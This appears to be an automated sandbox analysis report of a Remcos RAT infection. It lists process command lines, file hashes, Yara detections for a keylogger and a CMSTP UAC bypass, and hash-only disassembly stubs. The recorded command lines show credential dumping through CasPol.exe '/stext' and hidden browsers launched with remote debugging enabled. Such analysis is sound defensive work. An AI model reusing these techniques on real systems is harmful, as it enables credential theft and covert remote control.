                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                Start time:10:52:58
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                                                                                                                Imagebase:0xaa0000
                                                                                                                                                                                                                                File size:108'664 bytes
                                                                                                                                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.3861630082.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                Start time:10:53:23
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:--user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                                                                                                                                                                                                                                Imagebase:0x7ff678760000
                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                Start time:10:53:25
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\cakcgbw"
                                                                                                                                                                                                                                Imagebase:0x80000
                                                                                                                                                                                                                                File size:108'664 bytes
                                                                                                                                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                Start time:10:53:25
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\cakcgbw"
                                                                                                                                                                                                                                Imagebase:0x6d0000
                                                                                                                                                                                                                                File size:108'664 bytes
                                                                                                                                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                Start time:10:53:25
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\nupmhthbjzo"
                                                                                                                                                                                                                                Imagebase:0xe80000
                                                                                                                                                                                                                                File size:108'664 bytes
                                                                                                                                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                Start time:10:53:25
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                                                                                                                                                                                                                                Imagebase:0x1b0000
                                                                                                                                                                                                                                File size:108'664 bytes
                                                                                                                                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                Start time:10:53:25
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                                                                                                                                                                                                                                Imagebase:0x320000
                                                                                                                                                                                                                                File size:108'664 bytes
                                                                                                                                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                Start time:10:53:25
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                                                                                                                                                                                                                                Imagebase:0x290000
                                                                                                                                                                                                                                File size:108'664 bytes
                                                                                                                                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                Start time:10:53:25
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                                                                                                                                                                                                                                Imagebase:0x100000
                                                                                                                                                                                                                                File size:108'664 bytes
                                                                                                                                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                Start time:10:53:25
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                                                                                                                                                                                                                                Imagebase:0x6d0000
                                                                                                                                                                                                                                File size:108'664 bytes
                                                                                                                                                                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                Start time:10:53:32
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:--user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                                                                                                                                                                                                                                Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                                                Start time:10:53:32
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                Start time:10:53:33
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1972,i,17397243976134850236,17257031585275351317,262144 /prefetch:3
                                                                                                                                                                                                                                Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                Start time:10:53:33
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                                                Start time:10:53:35
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:3
                                                                                                                                                                                                                                Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                                                Start time:10:53:41
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6784 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:8
                                                                                                                                                                                                                                Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                                                Start time:10:53:41
                                                                                                                                                                                                                                Start date:18/11/2024
                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6888 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:8
                                                                                                                                                                                                                                Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                File size:4'210'216 bytes
                                                                                                                                                                                                                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 06D30FD7 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000003.1433522810.0000000006D30000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_3_6d30000_mshta.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                                  • Instruction ID: 07af50981ec2282c2e5c66a3c7af98c3e86f8200d87f03ee080c4e29cc453e53
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                  Function 06D30FDF Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000003.1433522810.0000000006D30000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_3_6d30000_mshta.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                                  • Instruction ID: 07af50981ec2282c2e5c66a3c7af98c3e86f8200d87f03ee080c4e29cc453e53
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                  Function 06D30FCF Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000003.1433522810.0000000006D30000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_3_6d30000_mshta.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                                  • Instruction ID: 07af50981ec2282c2e5c66a3c7af98c3e86f8200d87f03ee080c4e29cc453e53
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                  Function 06D30FE7 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000003.1433522810.0000000006D30000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_3_6d30000_mshta.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                                  • Instruction ID: 07af50981ec2282c2e5c66a3c7af98c3e86f8200d87f03ee080c4e29cc453e53
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 03104BB0 Relevance: 2.0, APIs: 1, Instructions: 491COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000001.00000002.1587663694.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_3100000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 40eea56132ea319d468738030b1b44c1ec5a4d0c8f9101a9c8303bbb09c26065
                                                                                                                                                                                                                                  • Instruction ID: 51dbd0e65728f3f1d3717ee662b5069070a51d6af44ae6a421bd831896b88b4a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40eea56132ea319d468738030b1b44c1ec5a4d0c8f9101a9c8303bbb09c26065
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35223774A012199FDB04CF99D884A9EFBB2FF88310F248159E915AB395CB75ED81CF90
                                                                                                                                                                                                                                  Function 077C1178 Relevance: 7.9, Strings: 6, Instructions: 439COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000001.00000002.1602018712.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_77c0000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 84i$84i$84i$84i$84i$84i
                                                                                                                                                                                                                                  • API String ID: 0-3608691829
                                                                                                                                                                                                                                  • Opcode ID: a949c017a47256782a1f60f2472d02b9f7659e073db4f9fe94af54fd479b2ad5
                                                                                                                                                                                                                                  • Instruction ID: 2847b5848c63952c0a9d0c89b0982650061b116688fd478ad5d36bb5e9d92c28
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a949c017a47256782a1f60f2472d02b9f7659e073db4f9fe94af54fd479b2ad5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8F135B4B00209AFDB14DF68C810B6ABBA2EFC9750F65846DE906AF381DB71DD41C791
                                                                                                                                                                                                                                  Function 077C115D Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000001.00000002.1602018712.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_77c0000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 84i$84i$84i
                                                                                                                                                                                                                                  • API String ID: 0-1595485978
                                                                                                                                                                                                                                  • Opcode ID: 968e0f389b8e94a38aa81b1fcc037b6f55e508298d1526d32c98f30f6950710f
                                                                                                                                                                                                                                  • Instruction ID: ddc060f2c6006eb001d965fa4bdd50909ffea3783017f6c8cdc4b4b5ad498133
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 968e0f389b8e94a38aa81b1fcc037b6f55e508298d1526d32c98f30f6950710f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F891D1F4B00209EBCB14DF58C550B69B7F2AF88750F69846DE906AB382DB71ED41CB91
                                                                                                                                                                                                                                  Function 077C04F8 Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000001.00000002.1602018712.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_77c0000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 84i$84i
                                                                                                                                                                                                                                  • API String ID: 0-1526663543
                                                                                                                                                                                                                                  • Opcode ID: 473b117510c44db6d55862ba97af0d64cacb4864cc97606c5d9ea0be2f353945
                                                                                                                                                                                                                                  • Instruction ID: f1212396850518108060d9903e945c70643e0dd209cb5ab66f21f6aac7dcd702
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 473b117510c44db6d55862ba97af0d64cacb4864cc97606c5d9ea0be2f353945
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B5114B1700314EFDB14EB689810B2ABBE6ABC9B50F24845EE949DF381DA71DD41C7E1
                                                                                                                                                                                                                                  Function 03101A30 Relevance: 1.6, APIs: 1, Instructions: 68filenetworkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 031051C9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000001.00000002.1587663694.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_3100000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DownloadFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1407266417-0
                                                                                                                                                                                                                                  • Opcode ID: 742f1e25dc6f1fc1b0ad2a3082b1c2bf0517c2b676d5db18743e11a4d3117725
                                                                                                                                                                                                                                  • Instruction ID: 5f0254fad352b7850649cbe91835802ea107278d1067f84703d2a1debcb14b50
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 742f1e25dc6f1fc1b0ad2a3082b1c2bf0517c2b676d5db18743e11a4d3117725
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 392104B1D01619EFDB04CF9AD984ADEFBF5FB48310F14812AE918A7250D374AA50CFA4
                                                                                                                                                                                                                                  Function 0308D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000001.00000002.1587216124.000000000308D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0308D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
